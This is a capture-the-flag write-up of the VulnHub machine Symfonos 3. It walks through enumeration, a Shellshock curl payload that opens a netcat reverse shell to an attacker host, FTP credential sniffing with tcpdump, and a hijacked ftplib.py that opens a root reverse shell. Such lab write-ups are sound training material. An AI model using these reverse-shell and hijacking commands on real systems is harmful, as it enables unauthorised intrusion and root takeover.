> For the complete documentation index, see [llms.txt](https://choochisiang.gitbook.io/report/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://choochisiang.gitbook.io/report/vulnhub/symfonos/symfonos-3.md). # Symfonos 3 ## Enumeration ### Nmap ``` nmap -sC -sV -oA nmap/sym3 192.168.1.114 ``` ``` Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 02:39 EDT Nmap scan report for 192.168.1.114 Host is up (0.00016s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5b 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 cd:64:72:76:80:51:7b:a8:c7:fd:b2:66:fa:b6:98:0c (RSA) | 256 74:e5:9a:5a:4c:16:90:ca:d8:f7:c7:78:e7:5a:86:81 (ECDSA) |_ 256 3c:e4:0b:b9:db:bf:01:8a:b7:9c:42:bc:cb:1e:41:6b (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Site doesn't have a title (text/html). MAC Address: 00:0C:29:DA:E2:26 (VMware) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds ``` Let's put the IP to the browser ![](/files/-M8EifxgzePspwk3en38) And we got this at the inspect elements ![](/files/-M8Eij2x9RBu0ECgJ67J) So, I decided to use dirb and gobuster ### dirb & gobuster ``` dirb http://192.168.1.114/ ``` ``` ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Tue May 26 02:42:28 2020 URL_BASE: http://192.168.1.114/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.1.114/ ---- + http://192.168.1.114/cgi-bin/ (CODE:403|SIZE:278) ==> DIRECTORY: http://192.168.1.114/gate/ + http://192.168.1.114/index.html (CODE:200|SIZE:241) + http://192.168.1.114/server-status (CODE:403|SIZE:278) ---- Entering directory: http://192.168.1.114/gate/ ---- + http://192.168.1.114/gate/index.html (CODE:200|SIZE:202) ----------------- END_TIME: Tue May 26 02:42:38 2020 DOWNLOADED: 9224 - FOUND: 4 ``` We got a directory called gate ![](/files/-M8Ej7eTjTPGOgt7_wHx) Nothing seems to be interesting, so let's continue to enumerate I can't enumerate anything from dirb so I changed to gobuster ``` gobuster dir -u http://192.168.1.114/gate/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ``` ``` =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.114/gate/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/05/26 02:44:57 Starting gobuster =============================================================== /cerberus (Status: 301) =============================================================== 2020/05/26 02:45:39 Finished =============================================================== ``` We got a directory called `/cerberus` Further enumeration I got `/tartarus` and I got this ![](/files/-M8Ek3sO1y2NEIzhngqD) At the inspect elements, it says it may be misleading ![](/files/-M8EkAVTuwH32yE8Mh4l) It seems that we might gone into a rabbit hole. So let's back to square one I use dirbuster to enumerate the URL again ![](/files/-M8EtNAfQiX_xmHuai8R) Then, when we enumerate, we got the underworld directory under cgi-bbin ![](/files/-M8Emz5lBDV5aHdwlh_z) Lets navigate to `/cgi-bin/underworld` ![](/files/-M8EvlxrhwchUgn3hisZ) Got this..hmmm After some research, found out that at the [Pentesterlab](https://pentesterlab.com/exercises/cve-2014-6271/course), the exploit is called `shellshock` ## Exploitation ### Reverse Shell We can get a reverse shell by using this command ``` curl -A "() { :; }; /bin/bash -c 'nc 192.168.1.117 443 -e /bin/sh'" http://192.168.1.118/cgi-bin/underworld ``` And we need to set up a listener at out machine ``` nc -nlvp 443 ``` ![](/files/-M8F2JvtVmUNZaHw0fLR) Got a reverse shell. Then we can type the python code to spawn a proper shell ``` python -c 'import pty; pty.spawn("/bin/bash")' ``` After that I use `tcpdump` to grab the ftp server network and store it at /tmp directory. ``` tcpdump -w ftplog.pcap -i lo ``` Then we can use `nc` to transfer the file to our machine to analyse it After that we can use wireshark to analyse it. We can filter it by `tcp.port == 21` and then we right click and choose follow TCP stream and then we can see this ![](/files/-M8F6rP88kZtRJp5vsn4) We got the password (PTpZTfU4vxgzvRBE) and username for user `hades` We can `su` to the user `hades` ![](/files/-M8F75d2xIjeiJI0SXnL) ## Privilege Escalation After that we run the `pspy` again Then we got this ![](/files/-M8FZFtjz9QVpVnatk7s) We know that there is a file running at `/opt/ftpclient` that can run as root. ![](/files/-M8IsZV22b76TML8xc3w) But when we go to the `/opt/ftpclient` we can see that we have no permission to edit the files. ### Python Library Hijacking After researching and asking the author of this machine cause I didn't know how it works, it is python library hijacking. ``` python -c 'import sys; print "\n".join(sys.path)' ``` Using this command will show the path that all the directories that python will look for to import the library according to the directories. ![](/files/-M8Itv8b_WTEZ-uZcT4Q) As we can see here there are bunch of folders ![](/files/-M8Iu5ACyi4dH2KwBxBv) If we `cat` into the `ftpclient.py` that is under `/opt/ftpclient`, we can see that the file is importing a library called `ftplib` We navigate to `/usr/lib/python2.7` Then we can type `ls -la | grep ftplib` ![](/files/-M8IutBaKEDUJAYIU1E4) We can see that ftplib.py can be modify by the user that is under group `gods` which can be edited by hades. We first rename the file to become a backup file Then we can nano ftplib.py to create a new file to replace the old one. Type in these code to get a reverse shell ``` import os import sys os.system("nc -e /bin/bash 192.168.1.116 4444") ``` Then save the file. Go to our machine to set up a listener ``` nc -nlvp 4444 ``` After waiting for 1 minute, we get a reverse shell back ![](/files/-M8Iw-lSUYsyOfFxNSlT) Then type the python code to get a proper shell Then, we got root ! ![](/files/-M8IwFfPPnAwyprwQrOu) Navigate to `/root` to get the `flag.txt` ![](/files/-M8IwMvefs4czp5u2vrp) Congratulation ! --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://choochisiang.gitbook.io/report/vulnhub/symfonos/symfonos-3.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.